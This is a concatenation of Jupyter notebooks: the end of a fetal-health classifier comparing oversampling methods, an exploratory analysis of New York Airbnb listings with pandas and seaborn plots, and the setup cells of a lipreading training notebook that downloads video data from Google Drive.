"/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
]
],
[
[
"4. SMOTE + ENN",
"_____no_output_____"
]
],
[
[
"from imblearn.combine import SMOTEENN\r\nsmenn = SMOTEENN()\r\nX_train_smenn, y_train_smenn = smenn.fit_resample(X_train, y_train)",
"/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n/usr/local/lib/python3.7/dist-packages/sklearn/utils/deprecation.py:87: FutureWarning: Function safe_indexing is deprecated; safe_indexing is deprecated in version 0.22 and will be removed in version 0.24.\n warnings.warn(msg, category=FutureWarning)\n"
],
[
"def evaluate_model(clf, X_test, y_test, model_name, oversample_type):\r\n print('--------------------------------------------')\r\n print('Model ', model_name)\r\n print('Data Type ', oversample_type)\r\n y_pred = clf.predict(X_test)\r\n f1 = f1_score(y_test, y_pred, average='weighted')\r\n recall = recall_score(y_test, y_pred, average='weighted')\r\n precision = precision_score(y_test, y_pred, average='weighted')\r\n print(classification_report(y_test, y_pred))\r\n print(\"F1 Score \", f1)\r\n print(\"Recall \", recall)\r\n print(\"Precision \", precision)\r\n return [model_name, oversample_type, f1, recall, precision]",
"_____no_output_____"
],
[
"models = {\r\n 'DecisionTrees': DecisionTreeClassifier(random_state=42),\r\n 'RandomForest':RandomForestClassifier(random_state=42),\r\n 'LinearSVC':LinearSVC(random_state=0),\r\n 'AdaBoostClassifier':AdaBoostClassifier(random_state=42),\r\n 'SGD':SGDClassifier()\r\n}",
"_____no_output_____"
],
[
"oversampled_data = {\r\n 'ACTUAL':[X_train, y_train],\r\n 'SMOTE':[X_train_sm, y_train_sm],\r\n 'ADASYN':[X_train_ada, y_train_ada],\r\n 'SMOTE_TOMEK':[X_train_smtom, y_train_smtom],\r\n 'SMOTE_ENN':[X_train_smenn, y_train_smenn]\r\n}",
"_____no_output_____"
],
[
"final_output = []\r\nfor model_k, model_clf in models.items():\r\n for data_type, data in oversampled_data.items():\r\n model_clf.fit(data[0], data[1])\r\n final_output.append(evaluate_model(model_clf, X_test, y_test, model_k, data_type))",
"--------------------------------------------\nModel DecisionTrees\nData Type ACTUAL\n precision recall f1-score support\n\n 1.0 0.97 0.95 0.96 413\n 2.0 0.80 0.85 0.83 82\n 3.0 0.92 0.95 0.93 37\n\n accuracy 0.94 532\n macro avg 0.90 0.92 0.91 532\nweighted avg 0.94 0.94 0.94 532\n\nF1 Score 0.9386188989575975\nRecall 0.9379699248120301\nPrecision 0.9395945726899018\n--------------------------------------------\nModel DecisionTrees\nData Type SMOTE\n precision recall f1-score support\n\n 1.0 0.97 0.95 0.96 413\n 2.0 0.78 0.85 0.81 82\n 3.0 0.89 0.92 0.91 37\n\n accuracy 0.93 532\n macro avg 0.88 0.91 0.89 532\nweighted avg 0.94 0.93 0.94 532\n\nF1 Score 0.9353761392465251\nRecall 0.9342105263157895\nPrecision 0.9372894575765451\n--------------------------------------------\nModel DecisionTrees\nData Type ADASYN\n precision recall f1-score support\n\n 1.0 0.96 0.94 0.95 413\n 2.0 0.72 0.74 0.73 82\n 3.0 0.81 0.92 0.86 37\n\n accuracy 0.91 532\n macro avg 0.83 0.87 0.85 532\nweighted avg 0.91 0.91 0.91 532\n\nF1 Score 0.907024687891699\nRecall 0.9060150375939849\nPrecision 0.9087291056773587\n--------------------------------------------\nModel DecisionTrees\nData Type SMOTE_TOMEK\n precision recall f1-score support\n\n 1.0 0.96 0.92 0.94 413\n 2.0 0.70 0.80 0.75 82\n 3.0 0.81 0.95 0.88 37\n\n accuracy 0.91 532\n macro avg 0.83 0.89 0.86 532\nweighted avg 0.91 0.91 0.91 532\n\nF1 Score 0.9085763604555944\nRecall 0.9060150375939849\nPrecision 0.9136330309611457\n--------------------------------------------\nModel DecisionTrees\nData Type SMOTE_ENN\n precision recall f1-score support\n\n 1.0 0.97 0.90 0.93 413\n 2.0 0.66 0.79 0.72 82\n 3.0 0.67 0.95 0.79 37\n\n accuracy 0.89 532\n macro avg 0.77 0.88 0.81 532\nweighted avg 0.90 0.89 0.89 532\n\nF1 Score 0.8908802486423862\nRecall 0.8853383458646616\nPrecision 0.9039517574795236\n--------------------------------------------\nModel RandomForest\nData Type ACTUAL\n precision recall f1-score support\n\n 1.0 0.96 0.98 0.97 413\n 2.0 0.89 0.80 0.85 82\n 3.0 0.89 0.92 0.91 37\n\n accuracy 0.95 532\n macro avg 0.92 0.90 0.91 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.9483607532081659\nRecall 0.9492481203007519\nPrecision 0.9482902223553192\n--------------------------------------------\nModel RandomForest\nData Type SMOTE\n precision recall f1-score support\n\n 1.0 0.98 0.96 0.97 413\n 2.0 0.83 0.87 0.85 82\n 3.0 0.90 0.95 0.92 37\n\n accuracy 0.95 532\n macro avg 0.90 0.92 0.91 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.9460401301254237\nRecall 0.9454887218045113\nPrecision 0.9469086136772796\n--------------------------------------------\nModel RandomForest\nData Type ADASYN\n precision recall f1-score support\n\n 1.0 0.98 0.96 0.97 413\n 2.0 0.83 0.87 0.85 82\n 3.0 0.92 0.95 0.93 37\n\n accuracy 0.95 532\n macro avg 0.91 0.93 0.92 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.947869794112914\nRecall 0.9473684210526315\nPrecision 0.9485978811417629\n--------------------------------------------\nModel RandomForest\nData Type SMOTE_TOMEK\n precision recall f1-score support\n\n 1.0 0.98 0.96 0.97 413\n 2.0 0.83 0.88 0.85 82\n 3.0 0.90 0.95 0.92 37\n\n accuracy 0.95 532\n macro avg 0.90 0.93 0.92 532\nweighted avg 0.95 0.95 0.95 532\n\nF1 Score 0.9499069158934915\nRecall 0.9492481203007519\nPrecision 0.9509948611582005\n--------------------------------------------\nModel RandomForest\nData Type SMOTE_ENN\n precision recall f1-score support\n\n 1.0 0.99 0.91 0.94 413\n 2.0 0.67 0.89 0.76 82\n 3.0 0.80 0.95 0.86 37\n\n accuracy 0.91 
532\n macro avg 0.82 0.91 0.86 532\nweighted avg 0.92 0.91 0.91 532\n\nF1 Score 0.9111118279507182\nRecall 0.9060150375939849\nPrecision 0.9246253769958906\n--------------------------------------------\nModel LinearSVC\nData Type ACTUAL\n precision recall f1-score support\n\n 1.0 0.94 0.94 0.94 413\n 2.0 0.67 0.63 0.65 82\n 3.0 0.73 0.81 0.77 37\n\n accuracy 0.88 532\n macro avg 0.78 0.79 0.79 532\nweighted avg 0.88 0.88 0.88 532\n\nF1 Score 0.8830104106419896\nRecall 0.8834586466165414\nPrecision 0.8829696191698759\n"
],
[
"final_df = pd.DataFrame(final_output, columns=['Model', 'DataType', 'F1', 'Recall', 'Precision'])",
"_____no_output_____"
],
[
"final_df.sort_values(by=\"F1\", ascending=False)",
"_____no_output_____"
]
],
[
[
"### Hyperparameter Tuning",
"_____no_output_____"
]
],
[
[
"param_grid = {\r\n 'criterion':['gini', 'entropy'],\r\n 'max_depth': [10, 20, 40, 80, 100],\r\n 'max_features': ['auto', 'sqrt'],\r\n 'n_estimators': [200, 400, 600, 800, 1000, 2000]\r\n}",
"_____no_output_____"
],
[
"rfc = RandomForestClassifier(random_state=42)\r\nrfc_cv = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5, verbose=2)\r\nrfc_cv.fit(X_train_smtom, y_train_smtom)",
"Fitting 5 folds for each of 120 candidates, totalling 600 fits\n[CV] criterion=gini, max_depth=10, max_features=auto, n_estimators=200 \n"
],
[
"rfc_cv.best_params_",
"_____no_output_____"
],
[
"rf = RandomForestClassifier(n_estimators=2000, criterion='entropy', max_depth=20, max_features='auto')\r\nrf.fit(X_train_smtom, y_train_smtom)\r\nevaluate_model(rf, X_test, y_test, 'RandomForest', 'SMOTE+TOMEK')",
"--------------------------------------------\nModel RandomForest\nData Type SMOTE+TOMEK\n precision recall f1-score support\n\n 1.0 0.98 0.97 0.97 413\n 2.0 0.85 0.89 0.87 82\n 3.0 0.90 0.97 0.94 37\n\n accuracy 0.95 532\n macro avg 0.91 0.94 0.93 532\nweighted avg 0.96 0.95 0.96 532\n\nF1 Score 0.9553939168600822\nRecall 0.9548872180451128\nPrecision 0.956360829901538\n"
],
[
"import pickle\r\nfilename = 'fetal-health-model.pkl'\r\npickle.dump(rf, open(filename, 'wb'))",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
]
] |
cb02c30e7127d37e08de1a380b624c2b39eea13e | 516,712 | ipynb | Jupyter Notebook | NY_Airbnb_Data_Analysis.ipynb | fastest-parrot/ml1-lab1 | 9541cdc6cff929fa45ad0d1dca032d42a595f23d | [
"MIT"
] | null | null | null | NY_Airbnb_Data_Analysis.ipynb | fastest-parrot/ml1-lab1 | 9541cdc6cff929fa45ad0d1dca032d42a595f23d | [
"MIT"
] | 2 | 2020-03-31T10:55:39.000Z | 2021-02-02T22:30:53.000Z | NY_Airbnb_Data_Analysis.ipynb | fastest-parrot/ml1-lab1 | 9541cdc6cff929fa45ad0d1dca032d42a595f23d | [
"MIT"
] | 2 | 2020-01-17T01:57:31.000Z | 2020-01-27T04:07:28.000Z | 438.262935 | 70,984 | 0.929843 | [
[
[
"import pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import cm",
"_____no_output_____"
],
[
"data = pd.read_csv('AB_NYC_2019.csv')",
"_____no_output_____"
],
[
"data.head()",
"_____no_output_____"
]
],
[
[
"Printing the columns of the dataset, as well as their types. This is an important step because depending of the type of \ndata that we have, the treatment that we have to perform differs.",
"_____no_output_____"
]
],
[
[
"data.columns",
"_____no_output_____"
],
[
"data.describe()",
"_____no_output_____"
],
[
"data.pivot_table(index='neighbourhood_group',columns='room_type',values='price',aggfunc='mean')",
"_____no_output_____"
]
],
[
[
"The relation among neighbourhood group, room type and price give a geneneral idea about the data. ",
"_____no_output_____"
]
],
[
[
"data.drop(columns=['id', 'name', 'host_id', 'host_name'], inplace=True)",
"_____no_output_____"
],
[
"#visualize the categorical values for the neighbourhood_group\nplt.figure(figsize=(6,4))\ncount_neigh = data.neighbourhood_group.value_counts()\n(count_neigh/data.shape[0]).plot(kind='bar');\nplt.title('Percent of neighbourhood group', fontsize = 12)\nplt.ylabel('percent', fontsize = 12)\nplt.xlabel('neighbourhood group', fontsize = 12)",
"_____no_output_____"
]
],
[
[
"In the listed neighborhood group the amount of business in Manhattan is largest and in Staten Island is the smallest. This is expected because in Manhattan and Brooklyn the amount of tourist is higher than the other because of their diiferent attarction of tourists in the area. ",
"_____no_output_____"
]
],
[
[
"#visualize the categorical values for the room_type\nplt.figure(figsize=(7,5))\ncount_room = data.room_type.value_counts()\n(count_room/data.shape[0]).plot(kind='bar');\nplt.title('room_type')\nplt.ylabel('the percent of every room type')",
"_____no_output_____"
]
],
[
[
"This variable is an indication of the human prefence with the nature of house and status of privacy. In all nighborhood the amount of people serving in home/apartment and private room is higher than shared room. Shared room business in this specific area is generally not significance. ",
"_____no_output_____"
]
],
[
[
"# reference: https://seaborn.pydata.org/generated/seaborn.catplot.html\nplt.figure(figsize=(12,12))\nsns.set_context(\"paper\")\nsns.set(style=\"darkgrid\", font_scale=.9)\nsns.catplot(x=\"room_type\", y=\"price\", data=data);",
"_____no_output_____"
],
[
"data.groupby('room_type')[['price','number_of_reviews']].mean()",
"_____no_output_____"
]
],
[
[
"The Entire rooms/apartments cost are more than just a shared room, where as the differece in price of a shared room and a private one is about 20 dollars. In contrast, the number of viewrs are higher in private room than the other. This small price differece between private room and shared room may lead to prefer the private room. \n",
"_____no_output_____"
],
[
"The overall price in the entire home is more expensive than the others. The price of the shared price is lower than the others. ",
"_____no_output_____"
]
],
[
[
"def plot_price_wrt_room_type(data,title):\n data2 = data.pivot(columns='room_type',values='price')\n x1=list(data2[data2.columns[0]])\n x2=list(data2[data2.columns[1]])\n x3=list(data2[data2.columns[2]])\n\n plt.figure(figsize=(8, 6))\n plt.rc('legend',**{'fontsize':12})\n plt.legend(fontsize=15)\n plt.rcParams['figure.figsize']=(15,8)\n plt.style.use(style='ggplot')\n plt.tick_params(labelsize=12)\n plt.tick_params(labelsize=12)\n plt.ylabel(\"Count\",fontsize=12,color='black')\n plt.xlabel(\"Price\",fontsize=12,color='black')\n plt.title(title,fontsize=12,color='black')\n plt.legend(prop={'size': 10}) \n n_bins=12\n colors = ['orange', 'aqua', 'green']\n labels=[data2.columns[0],data2.columns[1],data2.columns[2]]\n plt.hist([x1, x2, x3], n_bins, histtype='bar', \n color=colors, range=[0,300],label=labels,alpha=1)\n \n plt.legend(loc=\"upper right\")\n plt.show()",
"_____no_output_____"
],
[
"title='Price distribution with respect to room type'\nplot_price_wrt_room_type(data,title)",
"No handles with labels found to put in legend.\nNo handles with labels found to put in legend.\n"
]
],
[
[
"Price distribution with room type is an indicator for the preference of the business by the customer. Hence, the graph indicates guests more prefer the private room and which it's price is relatively under the average of the others. ",
"_____no_output_____"
]
],
[
[
"def plot_price_wrt_neigbourhood_group(data,title):\n data2 = data.pivot(columns='neighbourhood_group',values='price')\n x1=list(data2[data2.columns[0]])\n x2=list(data2[data2.columns[1]])\n x3=list(data2[data2.columns[2]])\n x4=list(data2[data2.columns[3]])\n x5=list(data2[data2.columns[4]])\n\n plt.figure(figsize=(9, 7))\n plt.style.use(style='ggplot')\n plt.rc('legend',**{'fontsize':12})\n plt.tick_params(labelsize=25) \n plt.legend(fontsize=20)\n plt.rcParams['figure.figsize']=(15,8) \n plt.ylabel(\"Count\",fontsize=12,color='black')\n plt.xlabel(\"Price\",fontsize=12,color='black')\n plt.title(title,fontsize=12,color='black')\n plt.legend(prop={'size': 8}) \n plt.tick_params(labelsize=12)\n n_bins=12\n colors = ['yellow', 'red', 'green', 'black', 'blue']\n labels=[data2.columns[0],data2.columns[1],data2.columns[2], data2.columns[3], data2.columns[4]]\n plt.hist([x1, x2, x3, x4, x5], n_bins, histtype='bar', \n color=colors, range=[0,400],label=labels,alpha=1)\n \n plt.legend(loc=\"upper right\")\n plt.show()",
"_____no_output_____"
],
[
"title='plot_price_wrt_neigbourhood_group'\nplot_price_wrt_neigbourhood_group(data,title)",
"No handles with labels found to put in legend.\nNo handles with labels found to put in legend.\n"
]
],
[
[
"Neighbourhood Manhattan has highest price with high demand.The area is highly visited by the investor and having high demand and high price is expected.",
"_____no_output_____"
]
],
[
[
"#plt.subplot2grid((2,3), (0,0))\n#data.room_type[data.neighbourhood_group == \"..... \"].value_counts(normalize = True).plot(kind = \"bar\", alpha= 0.5)\n#plt.title(\"room_type with neigbourhood_group\")",
"_____no_output_____"
],
[
"plt.figure(figsize=(8,6))\ndata.boxplot(column='price', return_type='axes') \nplt.show()",
"_____no_output_____"
]
],
[
[
"This plot indicates the overall price distribution. The plot indicates the majority of the record is above the average price.",
"_____no_output_____"
]
],
[
[
"plt.figure(figsize = (9, 6))\nplt.plot(data.groupby(['neighbourhood_group'])['price'].mean().keys(),data.groupby(['neighbourhood_group'])['price'].mean().values,'o')\nplt.title('Newyork City Average Airbnb price per region')\nplt.ylabel('Price')\nplt.xlabel('Neighbourhood group')\ncolor = ['DarkBlue']\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"As we see that the average price in Manhattan is higher than in other regions. Manhattan is the most populated of Newyork City. it is among the world's major commerical, financial and cultural ceters. because of this the area has high tourists. ",
"_____no_output_____"
]
],
[
[
"#boxplot neighbourhood_group and room availability\nsns.set(style='whitegrid', rc={\"grid.linewidth\": 0.1})\nsns.set_context(\"paper\", font_scale=0.9) \nplt.figure(figsize=(10,10)) \nplt.tight_layout() \n \nsns.despine(left=True, bottom=True) \nplt.savefig('test.pdf', bbox_inches='tight') \ndf1 = sns.boxplot(data=data, x='neighbourhood_group',y='availability_365',palette='inferno')\n\n",
"_____no_output_____"
]
],
[
[
"Availability of one the key aprameter for this business and for anyother business. As the plot indicates there is a no enough supply for all neighborhood group for 365 days. ",
"_____no_output_____"
],
[
"### Neighbourhood gorup colored by price",
"_____no_output_____"
]
],
[
[
"# reference: https://plot.ly/python/line-and-scatter/\nregions_dict = {value: i for i,value in enumerate(data.neighbourhood_group.unique())}\nreverse_regions_dict = {i:v for v,i in regions_dict.items()}\ndata = data.applymap(lambda s: regions_dict.get(s) if s in regions_dict.keys() else s)",
"_____no_output_____"
],
[
"# reference: https://plot.ly/python/line-and-scatter/\nplt.figure(figsize=(12, 5))\nplt.scatter(data.latitude,data.longitude, c = data.neighbourhood_group,cmap='magma')\nplt.title('New York city map colored by neighboorhoud_group')\n#plt.legend()\nplt.show()",
"_____no_output_____"
]
],
[
[
"This graph is inlustrates another quantitative variables(longitude and latitude) with neighborhood group. ",
"_____no_output_____"
]
],
[
[
"\nfor i,region in enumerate(data.groupby(['neighbourhood_group'])['price'].mean().keys()):\n NY_data = data[data.neighbourhood_group == region]\n plt.figure(figsize=(8, 5))\n # xxx, sub = plt.subplots(1, 2)\n plt.scatter(NY_data.latitude, NY_data.longitude, c = NY_data.price,cmap='PuBuGn')\n plt.title('{} Prices'.format(reverse_regions_dict[region]))\n plt.colorbar()\n plt.show()",
"_____no_output_____"
]
],
[
[
"When we look at the amount of owners per region, it is interesting to notice that in the regions where the rent price is\nhigher, the number of owners is also higher. That is probably due to the fact that as the apartments cost more in such regions\nis harder to find owners of two or more houses there.",
"_____no_output_____"
]
],
[
[
"sns.heatmap(data[['latitude','longitude','price','minimum_nights','availability_365','number_of_reviews']].corr(),annot=True)\nplt.show()",
"_____no_output_____"
]
],
[
[
"As seen in the correlation matrix, homes that are more available tend to have more reviews, which is natural,\nsince as the place is avaliable more days in a year more people can rent it.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb02ce6a43a4a02f62355d63896ea8d75d928378 | 55,116 | ipynb | Jupyter Notebook | lipreading/Lipreading_Training_Demo_[Cleaner].ipynb | elekhtron/MathResearchQHSS | b680fc1995b03b55fa360e3ca7f83bfcf237503d | [
"MIT"
] | null | null | null | lipreading/Lipreading_Training_Demo_[Cleaner].ipynb | elekhtron/MathResearchQHSS | b680fc1995b03b55fa360e3ca7f83bfcf237503d | [
"MIT"
] | null | null | null | lipreading/Lipreading_Training_Demo_[Cleaner].ipynb | elekhtron/MathResearchQHSS | b680fc1995b03b55fa360e3ca7f83bfcf237503d | [
"MIT"
] | null | null | null | 69.067669 | 2,917 | 0.59988 | [
[
[
"<a href=\"https://colab.research.google.com/github/jchen42703/MathResearchQHSS/blob/lipreading-temp/lipreading/Lipreading_Training_Demo_[Cleaner].ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
]
],
[
[
"!apt install ffmpeg",
"Reading package lists... Done\nBuilding dependency tree \nReading state information... Done\nffmpeg is already the newest version (7:3.4.4-0ubuntu0.18.04.1).\n0 upgraded, 0 newly installed, 0 to remove and 8 not upgraded.\n"
],
[
"! pip install ffmpeg sk-video",
"Requirement already satisfied: ffmpeg in /usr/local/lib/python3.6/dist-packages (1.4)\nRequirement already satisfied: sk-video in /usr/local/lib/python3.6/dist-packages (1.1.10)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from sk-video) (1.1.0)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from sk-video) (1.14.6)\n"
]
],
[
[
"# IO\n* Uploading data through google drive; ask [email protected] or [email protected] to share it with you. ",
"_____no_output_____"
]
],
[
[
"import os\n!mkdir s1\n!mkdir s1_align\nos.listdir()\n\n!pip install -U -q PyDrive\n\ns1_folder_id = '1B8cIYz6ljEbjYapG6EW1NrKHgcpZ2HzD'\ns1_align_folder_id = '1swcuyFY-ZdNgFBou5GiigfEXsURcPO63'\n\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials\n# 1. Authenticate and create the PyDrive client.\nauth.authenticate_user()\ngauth = GoogleAuth()\ngauth.credentials = GoogleCredentials.get_application_default()\ndrive = GoogleDrive(gauth)",
"mkdir: cannot create directory ‘s1’: File exists\nmkdir: cannot create directory ‘s1_align’: File exists\n"
],
[
"# uploading all of speaker 1's .mpg files.\n%cd '/content/s1'\n!pwd\n\nfile_list = drive.ListFile({'q': \"'{}' in parents and trashed=false\".format(s1_folder_id)}).GetList()\n\nfor file1 in sorted(file_list, key = lambda x: x['title']):\n print('Downloading {} from GDrive'.format(file1['title'])) # i+1, len(file_list)))\n file1.GetContentFile(file1['title'])",
"_____no_output_____"
],
[
"# uploading all of the corresponding align files (labels)\ncd '/content/s1_align'\n!pwd\n\nfile_list = drive.ListFile({'q': \"'{}' in parents and trashed=false\".format(s1_align_folder_id)}).GetList()\n\nfor file1 in sorted(file_list, key = lambda x: x['title']):\n print('Downloading {} from GDrive'.format(file1['title'])) # i+1, len(file_list)))\n file1.GetContentFile(file1['title'])",
"_____no_output_____"
],
[
"# check directories\n%cd '/content/'\n# os.listdir('/content'), os.listdir('/content/training'), os.listdir('/content/labels')",
"/content\n"
]
],
[
[
"## Model + IO\n",
"_____no_output_____"
]
],
[
[
"! rm -r MathResearchQHSS\n! git clone -b lipreading https://github.com/jchen42703/MathResearchQHSS.git",
"Cloning into 'MathResearchQHSS'...\nremote: Enumerating objects: 56, done.\u001b[K\nremote: Counting objects: 1% (1/56) \u001b[K\rremote: Counting objects: 3% (2/56) \u001b[K\rremote: Counting objects: 5% (3/56) \u001b[K\rremote: Counting objects: 7% (4/56) \u001b[K\rremote: Counting objects: 8% (5/56) \u001b[K\rremote: Counting objects: 10% (6/56) \u001b[K\rremote: Counting objects: 12% (7/56) \u001b[K\rremote: Counting objects: 14% (8/56) \u001b[K\rremote: Counting objects: 16% (9/56) \u001b[K\rremote: Counting objects: 17% (10/56) \u001b[K\rremote: Counting objects: 19% (11/56) \u001b[K\rremote: Counting objects: 21% (12/56) \u001b[K\rremote: Counting objects: 23% (13/56) \u001b[K\rremote: Counting objects: 25% (14/56) \u001b[K\rremote: Counting objects: 26% (15/56) \u001b[K\rremote: Counting objects: 28% (16/56) \u001b[K\rremote: Counting objects: 30% (17/56) \u001b[K\rremote: Counting objects: 32% (18/56) \u001b[K\rremote: Counting objects: 33% (19/56) \u001b[K\rremote: Counting objects: 35% (20/56) \u001b[K\rremote: Counting objects: 37% (21/56) \u001b[K\rremote: Counting objects: 39% (22/56) \u001b[K\rremote: Counting objects: 41% (23/56) \u001b[K\rremote: Counting objects: 42% (24/56) \u001b[K\rremote: Counting objects: 44% (25/56) \u001b[K\rremote: Counting objects: 46% (26/56) \u001b[K\rremote: Counting objects: 48% (27/56) \u001b[K\rremote: Counting objects: 50% (28/56) \u001b[K\rremote: Counting objects: 51% (29/56) \u001b[K\rremote: Counting objects: 53% (30/56) \u001b[K\rremote: Counting objects: 55% (31/56) \u001b[K\rremote: Counting objects: 57% (32/56) \u001b[K\rremote: Counting objects: 58% (33/56) \u001b[K\rremote: Counting objects: 60% (34/56) \u001b[K\rremote: Counting objects: 62% (35/56) \u001b[K\rremote: Counting objects: 64% (36/56) \u001b[K\rremote: Counting objects: 66% (37/56) \u001b[K\rremote: Counting objects: 67% (38/56) \u001b[K\rremote: Counting objects: 69% (39/56) \u001b[K\rremote: Counting objects: 71% (40/56) \u001b[K\rremote: Counting objects: 73% (41/56) \u001b[K\rremote: Counting objects: 75% (42/56) \u001b[K\rremote: Counting objects: 76% (43/56) \u001b[K\rremote: Counting objects: 78% (44/56) \u001b[K\rremote: Counting objects: 80% (45/56) \u001b[K\rremote: Counting objects: 82% (46/56) \u001b[K\rremote: Counting objects: 83% (47/56) \u001b[K\rremote: Counting objects: 85% (48/56) \u001b[K\rremote: Counting objects: 87% (49/56) \u001b[K\rremote: Counting objects: 89% (50/56) \u001b[K\rremote: Counting objects: 91% (51/56) \u001b[K\rremote: Counting objects: 92% (52/56) \u001b[K\rremote: Counting objects: 94% (53/56) \u001b[K\rremote: Counting objects: 96% (54/56) \u001b[K\rremote: Counting objects: 98% (55/56) \u001b[K\rremote: Counting objects: 100% (56/56) \u001b[K\rremote: Counting objects: 100% (56/56), done.\u001b[K\nremote: Compressing objects: 100% (56/56), done.\u001b[K\nremote: Total 362 (delta 39), reused 0 (delta 0), pack-reused 306\u001b[K\nReceiving objects: 100% (362/362), 21.20 MiB | 8.43 MiB/s, done.\nResolving deltas: 100% (187/187), done.\n"
],
[
"%cd MathResearchQHSS\n!pip install -r requirements.txt\n%cd '/content/'",
"/content/MathResearchQHSS\nRequirement already satisfied: pandas>=0.23.0 in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 1)) (0.23.4)\nRequirement already satisfied: seaborn>=0.9.0 in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 2)) (0.9.0)\nRequirement already satisfied: quandl in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 3)) (3.4.5)\nRequirement already satisfied: numpy in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 4)) (1.14.6)\nRequirement already satisfied: scipy in /usr/local/lib/python3.6/dist-packages (from -r requirements.txt (line 5)) (1.1.0)\nRequirement already satisfied: python-dateutil>=2.5.0 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.23.0->-r requirements.txt (line 1)) (2.5.3)\nRequirement already satisfied: pytz>=2011k in /usr/local/lib/python3.6/dist-packages (from pandas>=0.23.0->-r requirements.txt (line 1)) (2018.7)\nRequirement already satisfied: matplotlib>=1.4.3 in /usr/local/lib/python3.6/dist-packages (from seaborn>=0.9.0->-r requirements.txt (line 2)) (2.1.2)\nRequirement already satisfied: more-itertools in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (4.3.0)\nRequirement already satisfied: requests>=2.7.0 in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (2.18.4)\nRequirement already satisfied: inflection>=0.3.1 in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (0.3.1)\nRequirement already satisfied: six in /usr/local/lib/python3.6/dist-packages (from quandl->-r requirements.txt (line 3)) (1.11.0)\nRequirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.4.3->seaborn>=0.9.0->-r requirements.txt (line 2)) (2.3.0)\nRequirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib>=1.4.3->seaborn>=0.9.0->-r requirements.txt (line 2)) (0.10.0)\nRequirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from 